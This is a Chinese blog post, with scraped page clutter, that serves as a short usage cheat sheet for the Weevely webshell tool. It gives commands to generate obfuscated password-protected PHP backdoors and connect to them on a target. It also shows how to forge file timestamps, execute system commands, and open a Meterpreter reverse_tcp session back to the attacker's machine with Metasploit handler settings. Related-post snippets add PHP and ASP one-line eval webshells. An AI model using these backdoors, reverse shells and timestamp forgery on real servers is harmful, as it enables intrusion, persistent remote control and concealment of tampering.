Linux下的菜刀weevely

于 2022-08-16 18:46:54 发布
阅读量355 收藏
点赞数
分类专栏: kali工具篇 文章标签: servlet java 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126370403
版权

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关。

一、生成shell

        命令:weevely  generate  <password>  <文件名>

        例子:weevely generate shell shell.php

二、连接shell

        命令:weevely  <URL>  <password> 

        例子:weevely http://192.168.3.248/shell.php  shell

三、生成混淆shell

        命令:weevely  generate  -obfuscator  cleartext1_php  <password>  <文件名>

Weevely模块使用

一、信息搜集

        :system_info        收集系统信息

        :system_info  -info        查找自己连接ip

二、文件管理

        :file_touch        修改文件时间

        :file_touch -human-ts '2004-02-29 16:21:42' 1.txt

三、命令执行

        :shell_php        执行php命令

        :shell_php  system(' ipconfig ')

四、生成meterpreter会话

        :backdoor_meterpreter  -payload  php/meterpreter/reverse_tcp  -l  host  本机ip  -port  端口

        MSF设置

                use  exploit  multi/handler

                show  paylaods

                set  pauload  php/meterpreter/reverse_tcp 

                show  lhost  本机ip

                run

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weevely(Linux中的菜刀)
qq_45521281的博客
06-06 7821
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 文章目录基本用法后门生成连接后门weevely模块几个模块的使用::shell_su模块:system_info模块:audit_disablefunctionbypass模块:audit_etcpasswd模块:backdoor_reversetcp模块:audit.phpconf使用技巧获取其他用户的凭据绕过策略读取/etc/passwd猜解SQL用户凭据日志清理绕过系统禁用函
linux 运行菜刀,linux 菜刀
weixin_34886431的博客
04-30 278
好像win下只能调用dll,既然你是用c/c++开发的库,那就应该尽可能的使用跨平台的api,win下发布为dll,linux下发布为so。就像汽车靠轮子走,轮船靠螺旋桨走是一个道理,虽然都是发动机带动。so是linux下编译的库文件而dll是win平台的是不是win上面安装了EcgAnalysis,linux上面没有安装EcgAnalysis类?你可以去看一些跨平台的解决方案,例如Eclipse...
linux菜刀Weevely(php菜刀)工具使用超详解
qq_45300786的博客
12-06 751
weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。 项目地址:https://github.com/epinna/Weevely -后门生成&连接 测试系统:kali linux 5.3.0 amd64 环境:kali linux 自带apache+p
Weevely linux中的中国菜刀(转)
hackerie的博客
10-24 1846
转载: http://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.htmlweevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
培训linux靶机竞赛解题文档1
08-08
Linux靶机竞赛解题详解】 在网络安全竞赛中,Linux靶机挑战是常见的环节,它旨在测试参赛者对Linux系统安全、漏洞利用和渗透测试的理解。以下是对标题和描述中涉及的知识点的详细解释: 1. **后台弱口令猜测**:...
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
python模拟菜刀反弹shell绕过限制【推荐】
09-19
主要介绍了利用python模拟菜刀反弹shell绕过限制,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
kali新手上路代码.html
03-18
kali新手上路代码.html
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
Linux Shell Weevely
m0_55313512的博客
02-26 874
Weevely
kali linux下的weevely 的使用
young‘s blog
07-11 1929
weevely是kali linux中一个管理工具,通过后门连接。 可以生成后门,可以通过后门连接上。并且会对产生的后门进行一些免杀的编写,但是免杀效果咋样还需要测试一下。 ...
中国菜刀能在linux上运行吗,中国菜刀的使用教程
weixin_39905624的博客
05-01 410
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
中国菜刀能在linux上运行吗,【Web Shell】- 技术剖析中国菜刀
weixin_29775447的博客
05-01 701
在第一部分,简单描述了中国菜刀的基本功能。本文我将剖析中国菜刀的平台多功能性、传输机制、交互模式和检测。我希望通过我的讲解,您能够根据您的环境检测出并清除它。平台那么中国菜刀可以在哪些平台上运行?答案是任何能够运行JSP、ASP、ASPX、PHP、CFM的Web服务器。这些是大多数Web应用程序语言。那么操作系统呢?中国菜刀足够灵活,可以在Windows和Linux上运行。这种操作系统和应用程序的...
kali中的中国菜刀weevely
司令2017的博客
04-17 2万+
weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行。     weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely
热门推荐
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: &amp;amp;lt;%execute(request(&amp;quot;pass&amp;quot;))%&amp;amp;gt; php一句话木马: &amp;amp;lt;?php @eval($_POS
linux菜刀使用教程,中国菜刀的使用教程
weixin_42514777的博客
05-05 1108
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
菜刀的基本使用
ChenZIDu的博客
09-22 1513
看到随便上传,想到一句话木马,然后上传一个 <?php eval($_POST['a']); ?> 然后显示上传成功,点击进去查看发现 没有成功,他屏蔽了<?php,几个字符。 发现还有另一种JS(javascript)脚本风格的写法 <script language="PHP"> @eval($_POST["code"]); &lt...
2021Kali系列 -- linux菜刀(weevely3)
weixin_41489908的博客
04-19 2591
​人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。 ---- 网易云热评 简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。 一、下载地址(软件作者) https://github.com/ep..
buuctf菜刀666
最新发布
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要找到解压密码,可以在数据流中寻找或者进行爆破。请注意,解压密码可能以password的方式出现在数据流中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值